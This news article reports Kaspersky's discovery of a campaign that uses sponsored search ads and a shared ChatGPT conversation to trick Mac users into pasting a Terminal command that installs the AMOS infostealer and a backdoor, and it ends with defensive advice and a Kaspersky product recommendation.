Growing Malware Threats Target Mac Users Through Deceptive Campaigns
Kaspersky’s Discovery of a New Malware Scheme
Kaspersky Threat Research has uncovered a concerning new malware campaign specifically targeting Mac users. This scheme cleverly uses paid Google search advertisements and discussions from the official ChatGPT website to deceive users into executing a command line that installs a powerful infostealer known as AMOS (Atomic macOS Stealer) along with a persistent backdoor on their systems.
How the Attackers Operate
The attackers strategically purchase sponsored search ads for terms like “chatgpt atlas” to lure unsuspecting users to a seemingly legitimate installation guide for something called “ChatGPT Atlas for macOS.” This guide, however, is a mirage—it directs users to a sanitized shared ChatGPT conversation. The only content remaining are the alleged step-by-step installation instructions.
In a deceptive twist, users are prompted to copy a single line of code, open the Terminal application on their Macs, and paste this command. From there, they are encouraged to grant all requested permissions without understanding what the command is truly doing.
The Execution of the Malicious Command
Kaspersky’s research reveals that the command downloads and executes a script hosted on an external site, atlas-extension[.]com. This script repeatedly requests the user’s system password, validating it against system commands. Once the correct password is input, the script brings down the AMOS infostealer, which then activates and begins its malicious activities. This attack strategy aligns with a technique known as ClickFix, where users unwittingly execute shell commands that fetch and run external code.
Data Collection and Exfiltration
Once AMOS is installed, it embarks on an extensive data collection mission. This malware targets sensitive information—passwords, cookies, and data from popular browsers, as well as cryptocurrency wallet details from applications like Electrum, Coinomi, and Exodus. Furthermore, it seeks out files with TXT, PDF, and DOCX extensions located in common directories such as Desktop, Documents, and Downloads, along with information stored in the Notes application. The gathered data is then sent to servers controlled by the attackers. Concurrently, a backdoor is established, allowing the attackers remote access and enabling the malware to automatically start on reboot.
A Broader Trend in Cyber Threats
This incident underscores a troubling trend: infostealers are rapidly becoming one of the most significant threats in 2025. Cybercriminals are increasingly leveraging AI-related themes, creating fake AI tools, and generating AI content to make their schemes appear more legitimate. This particular attack fits into a larger pattern where attackers exploit popular, reputable platforms and their legitimate features to further their malicious agendas.
Expert Insights on the Effectiveness of the Attack
Vladimir Gursky, a Malware Analyst at Kaspersky, notes that the effectiveness of this campaign does not stem from complex technical exploits. Instead, it lies in how the attackers utilize social engineering within a familiar AI context. The combination of a sponsored link leading to a well-designed page on a trusted domain, accompanied by a deceptively simple “installation guide,” leads many users to lower their guards. This risky blend of trust and simplicity can result in a full system compromise and long-standing access for attackers.
Recommendations for Users
In light of this growing threat, experts recommend that users exercise caution:
- Be Skeptical of Unsolicited Guides: Any guide that instructs you to run Terminal or PowerShell commands, especially if it includes copying and pasting site scripts, should be treated with suspicion.
- Seek Clarification: If you encounter unclear instructions, close those web pages or delete the messages and consult with a knowledgeable person before acting.
- Use AI or Security Tools for Verification: Consider pasting suspicious commands into reputable AI platforms or security tools to analyze what the code does before executing it.
- Install Trusted Security Software: Protect all devices, including macOS and Linux systems, by installing reputable security solutions like Kaspersky Premium, which are equipped to identify and obstruct infostealers and associated threats.
Staying vigilant and informed is critical in today’s evolving cybersecurity landscape.
